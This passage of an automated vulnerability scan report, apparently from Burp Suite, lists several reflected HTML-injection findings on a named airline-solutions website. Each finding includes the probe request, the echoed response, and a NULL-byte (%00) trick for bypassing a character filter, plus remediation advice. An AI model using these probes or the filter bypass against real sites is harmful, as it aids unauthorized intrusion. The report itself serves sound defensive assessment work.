This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/airline_reservations/more_customers/?%009bfb0<a>05937178652=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323016; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:16:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323016; expires=Thu, 06-Oct-2011 06:16:42 GMT; path=/
Set-Cookie: exp_last_activity=1286363802; expires=Thu, 06-Oct-2011 06:16:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fmore_customers%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:17:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33494


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>05937178652=1">?%009bfb0<a>05937178652=1</a>
...[SNIP]...

3.126. http://www.sabreairlinesolutions.com/home/products_services/customer_sales_service [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/customer_sales_service

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00adecf"><a>1bef3683590 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as adecf"><a>1bef3683590 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/customer_sales_service?%00adecf"><a>1bef3683590=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:34:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286318063; expires=Wed, 05-Oct-2011 17:34:23 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:34:37 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21566


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/airline_reservations?%00adecf"><a>1bef3683590=1">
...[SNIP]...

3.127. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/aircentre_technology/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations/aircentre_technology/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001e795<a>24403cf9831 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1e795<a>24403cf9831 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/enterprise_operations/aircentre_technology/?%001e795<a>24403cf9831=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:31:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322346; expires=Thu, 06-Oct-2011 03:32:04 GMT; path=/
Set-Cookie: exp_last_activity=1286353924; expires=Thu, 06-Oct-2011 03:32:04 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:32:09 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22145


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>24403cf9831=1">?%001e795<a>24403cf9831=1</a>
...[SNIP]...

3.128. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations/control_cost

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %005cbdc<a>f318e8866e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cbdc<a>f318e8866e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/enterprise_operations/control_cost?%005cbdc<a>f318e8866e=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323070; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Fsabre_revenue_integrity%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:25:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323070; expires=Thu, 06-Oct-2011 03:25:41 GMT; path=/
Set-Cookie: exp_last_activity=1286353541; expires=Thu, 06-Oct-2011 03:25:41 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A54%3A%22%2Fproducts_services%2Fenterprise_operations%2Fcontrol_cost%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Fsabre_revenue_integrity%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A4%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:25:51 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33751


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>f318e8866e=1">control cost?%005cbdc<a>f318e8866e=1</a>
...[SNIP]...

3.129. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations/downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00149e5<a>f1657a73226 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 149e5<a>f1657a73226 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/enterprise_operations/downloads?%00149e5<a>f1657a73226=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:25:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323049; expires=Thu, 06-Oct-2011 03:26:12 GMT; path=/
Set-Cookie: exp_last_activity=1286353572; expires=Thu, 06-Oct-2011 03:26:12 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fenterprise_operations%2Fdownloads%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:26:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>f1657a73226=1">downloads?%00149e5<a>f1657a73226=1</a>
...[SNIP]...

3.130. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations/my_list/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006d37f"><a>2a4fc9af41d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d37f"><a>2a4fc9af41d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/enterprise_operations/my_list/?%006d37f"><a>2a4fc9af41d=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:19:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322346; expires=Thu, 06-Oct-2011 03:19:43 GMT; path=/
Set-Cookie: exp_last_activity=1286353183; expires=Thu, 06-Oct-2011 03:19:43 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fmy_list%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:19:49 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/enterprise_operations/my_list/?%006d37f"><a>2a4fc9af41d=1">
...[SNIP]...

3.131. http://www.sabreairlinesolutions.com/home/products_services/marketing_planning [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/marketing_planning

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fb6b0"><a>8510af1fb38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb6b0"><a>8510af1fb38 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/marketing_planning?%00fb6b0"><a>8510af1fb38=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:39:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286318361; expires=Wed, 05-Oct-2011 17:39:21 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts_services%2Fcommercial_planning%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:39:32 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21427


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/commercial_planning?%00fb6b0"><a>8510af1fb38=1">
...[SNIP]...

3.132. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_acars_manager/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_acars_manager/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e5318"><a>81d14d067ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5318"><a>81d14d067ea in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product/sabre_aircentre_acars_manager/?%00e5318"><a>81d14d067ea=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322089; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A2%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:18:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322089; expires=Thu, 06-Oct-2011 02:18:05 GMT; path=/
Set-Cookie: exp_last_activity=1286349485; expires=Thu, 06-Oct-2011 02:18:05 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A3%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A4%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:18:25 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23600


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/products_services/sabre_aircentre_acars_manager/?%00e5318"><a>81d14d067ea=1">
...[SNIP]...

3.133. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_qualifier [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_crew_qualifier

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cdd01"><a>07b8258c1ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cdd01"><a>07b8258c1ef in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

